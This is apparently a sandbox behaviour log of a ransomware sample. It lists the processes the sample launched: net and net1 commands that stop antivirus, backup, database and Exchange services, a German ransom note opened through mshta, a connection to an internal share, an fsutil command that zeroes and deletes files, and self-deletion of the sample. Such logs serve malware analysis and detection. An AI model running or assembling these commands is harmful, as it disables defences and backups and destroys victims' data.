- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop TrueKeyScheduler /y
    3⤵
    PID:16496
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:9256
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLSERVERAGENT /y
    3⤵
    PID:16336
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop TrueKey /y
  2⤵
  PID:9248
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop TrueKey /y
    3⤵
    PID:16232
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:9240
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLSafeOLRService /y
    3⤵
    PID:16064
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop tmlisten /y
  2⤵
  PID:9232
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop tmlisten /y
    3⤵
    PID:16504
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLBrowser /y
  2⤵
  PID:9224
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLBrowser /y
    3⤵
    PID:16056
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:6688
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:13156
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SmcService /y
  2⤵
  PID:6680
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SmcService /y
    3⤵
    PID:13188
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:6672
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:14812
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Smcinst /y
  2⤵
  PID:6664
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop Smcinst /y
    3⤵
    PID:13500
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:6648
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROD /y
    3⤵
    PID:13140
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ShMonitor /y
  2⤵
  PID:6640
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ShMonitor /y
    3⤵
    PID:13904
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:6632
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:14788
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SepMasterService /y
  2⤵
  PID:6616
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SepMasterService /y
    3⤵
    PID:13172
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:6608
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:13668
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SAVService /y
  2⤵
  PID:6600
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SAVService /y
    3⤵
    PID:13756
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:6592
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
    3⤵
    PID:13148
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SAVAdminService /y
  2⤵
  PID:6576
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SAVAdminService /y
    3⤵
    PID:13960
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:6568
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CXDB /y
    3⤵
    PID:14000
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sacsvr /y
  2⤵
  PID:6560
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop sacsvr /y
    3⤵
    PID:13164
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:6544
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:13492
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:6536
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
    3⤵
    PID:13524
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:6528
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:13660
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop sms_site_sql_backup /y
  2⤵
  PID:6520
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfevtp /y
  2⤵
  PID:6504
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop mfevtp /y
    3⤵
    PID:16908
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop RESvc /y
  2⤵
  PID:6496
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop RESvc /y
    3⤵
    PID:16520
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:6488
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:13700
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfemms /y
  2⤵
  PID:6480
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop mfemms /y
    3⤵
    PID:16464
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:6468
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:16696
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:6460
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:16868
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mfefire /y
  2⤵
  PID:6452
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop mfefire /y
    3⤵
    PID:16016
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop OracleClientCache80 /y
  2⤵
  PID:6444
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop OracleClientCache80 /y
    3⤵
    PID:17252
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:6436
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:16296
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McTaskManager /y
  2⤵
  PID:6428
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McTaskManager /y
    3⤵
    PID:13804
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MySQL80 /y
  2⤵
  PID:6416
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MySQL80 /y
    3⤵
    PID:15268
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:6408
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamRESTSvc /y
    3⤵
    PID:16304
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McShield /y
  2⤵
  PID:6400
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McShield /y
    3⤵
    PID:15260
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:6392
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MySQL57 /y
    3⤵
    PID:16892
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:6376
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:16320
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:6368
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:16040
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:6352
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
    3⤵
    PID:16860
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamMountSvc /y
  2⤵
  PID:6344
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamMountSvc /y
    3⤵
    PID:17064
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeFramework /y
  2⤵
  PID:6336
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McAfeeFramework /y
    3⤵
    PID:17004
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:6320
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
    3⤵
    PID:17036
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:6312
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
    3⤵
    PID:16512
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop McAfeeEngineService /y
  2⤵
  PID:6304
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop McAfeeEngineService /y
    3⤵
    PID:16312
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:6296
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper /y
    3⤵
    PID:16472
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:6280
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:14796
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MBEndpointAgent /y
  2⤵
  PID:6272
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MBEndpointAgent /y
    3⤵
    PID:16688
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLSERVER /y
  2⤵
  PID:6264
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MSSQLSERVER /y
    3⤵
    PID:15252
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:6248
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploySvc /y
    3⤵
    PID:16360
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MBAMService /y
  2⤵
  PID:6240
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop MBAMService /y
    3⤵
    PID:16024
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:6232
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:6224
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop masvc /y
  2⤵
  PID:6208
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:6200
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:6192
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop macmnsvc /y
  2⤵
  PID:6184
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:6176
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:6160
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop klnagent /y
  2⤵
  PID:6152
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:5344
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:4836
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop kavfsslp /y
  2⤵
  PID:5144
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop kavfsslp /y
    3⤵
    PID:17028
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:4700
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:5128
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop KAVFSGT /y
  2⤵
  PID:6140
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:6124
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:6116
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop KAVFS /y
  2⤵
  PID:6104
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:6096
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:6088
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop FA_Scheduler /y
  2⤵
  PID:6080
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:6072
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SDRSVC /y
  2⤵
  PID:6064
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ESHASRV /y
  2⤵
  PID:6052
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:6044
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:6028
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop EsgShKernel /y
  2⤵
  PID:6020
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:6012
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ntrtscan /y
  2⤵
  PID:6004
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop EPUpdateService /y
  2⤵
  PID:5988
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$TPS /y
  2⤵
  PID:5972
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:5964
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop EPSecurityService /y
  2⤵
  PID:5948
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:5932
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop mozyprobackup /y
  2⤵
  PID:5916
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ekrn /y
  2⤵
  PID:5908
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:5900
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MMS /y
  2⤵
  PID:5892
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop EhttpSrv /y
  2⤵
  PID:5884
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:5872
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:5864
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop DCAgent /y
  2⤵
  PID:5856
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:5848
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:5840
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AVP /y
  2⤵
  PID:5832
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:5824
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /
  2⤵
  PID:5816
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:5804
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop Antivirus /y
  2⤵
  PID:5796
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:5788
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:5780
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:5772
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$PROD /y
  2⤵
  PID:5764
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:5756
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Web Control Service” /y
  2⤵
  PID:5744
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:5736
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:5728
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos System Protection Service” /y
  2⤵
  PID:5720
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:5712
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:5704
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Safestore Service” /y
  2⤵
  PID:5696
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop audioendpointbuilder /y
  2⤵
  PID:5688
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:5676
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:5668
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Message Router” /y
  2⤵
  PID:5660
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop unistoresvc_1af40a /y
  2⤵
  PID:5652
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:5644
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:5636
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos MCS Client” /y
  2⤵
  PID:5628
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop msexchangeimap4 /y
  2⤵
  PID:5620
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “intel(r) proset monitoring service” /y
  2⤵
  PID:5604
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:5596
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:5588
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos MCS Agent” /y
  2⤵
  PID:5580
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop msexchangeadtopology /y
  2⤵
  PID:5572
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “aphidmonitorservice” /y
  2⤵
  PID:5564
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:5556
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:5540
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Health Service” /y
  2⤵
  PID:5532
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeSRS /y
  2⤵
  PID:5524
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop W3Svc /y
  2⤵
  PID:5508
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:5500
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2⤵
  PID:5492
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer$TPS /y
  2⤵
  PID:5484
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos File Scanner Service” /y
  2⤵
  PID:5476
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeSA /y
  2⤵
  PID:5468
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop UI0Detect /y
  2⤵
  PID:5460
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:5452
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Symantec System Recovery” /y
  2⤵
  PID:5444
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:5436
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Device Control Service” /y
  2⤵
  PID:5428
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeMTA /y
  2⤵
  PID:5412
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SstpSvc /y
  2⤵
  PID:5404
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop msftesql$PROD /y
  2⤵
  PID:5396
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “SQLsafe Filter Service” /y
  2⤵
  PID:5388
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:5380
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SMTPSvc /y
  2⤵
  PID:5372
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Clean Service” /y
  2⤵
  PID:5364
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:5356
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop POP3Svc /y
  2⤵
  PID:5348
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MsDtsServer110 /y
  2⤵
  PID:5332
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “SQLsafe Backup Service” /y
  2⤵
  PID:5324
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop ReportServer /y
  2⤵
  PID:5316
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop SamSs /y
  2⤵
  PID:5300
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos AutoUpdate Service” /y
  2⤵
  PID:5292
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeIS /y
  2⤵
  PID:5276
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop NetMsmqActivator /y
  2⤵
  PID:5268
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MsDtsServer100 /y
  2⤵
  PID:5260
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Enterprise Client Service” /y
  2⤵
  PID:5244
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop EraserSvc11710 /y
  2⤵
  PID:5236
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop “Sophos Agent” /y
  2⤵
  PID:5228
- C:\Windows\SysWOW64\net.exe
  "net.exe" stop MSExchangeES /y
  2⤵
  PID:5220
- C:\Windows\SysWOW64\net.exe
  "net.exe" use \\10.10.0.17
  2⤵
  PID:15968
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp27FB.bat
  2⤵
  PID:15588
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\DATEIEN_VERSCHLUESSELT.hta
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:12852
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:13668
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:2304
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:7552
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
  2⤵
  PID:13728
- - C:\Windows\SysWOW64\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
1⤵
PID:7928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
1⤵
PID:11768

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
1⤵
PID:11760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:11752

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:11744

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
1⤵
PID:11736

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
1⤵
PID:11728

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
1⤵
PID:12972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
1⤵
PID:12880

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
1⤵
PID:12868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
1⤵
PID:12860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
1⤵
PID:12852

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
1⤵
PID:12836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
1⤵
PID:12844

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
1⤵
PID:12824

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:12820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:12812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
1⤵
PID:13036

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
1⤵
PID:13344

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
1⤵
PID:13336

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
1⤵
PID:13324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
1⤵
PID:13316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
1⤵
PID:8556

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
1⤵
PID:10676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
1⤵
PID:11464

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
1⤵
PID:12220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
1⤵
PID:11448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
1⤵
PID:11440

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
1⤵
PID:10564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
1⤵
PID:10404

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
1⤵
PID:10444

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
1⤵
PID:13308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
1⤵
PID:13300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
1⤵
PID:13292

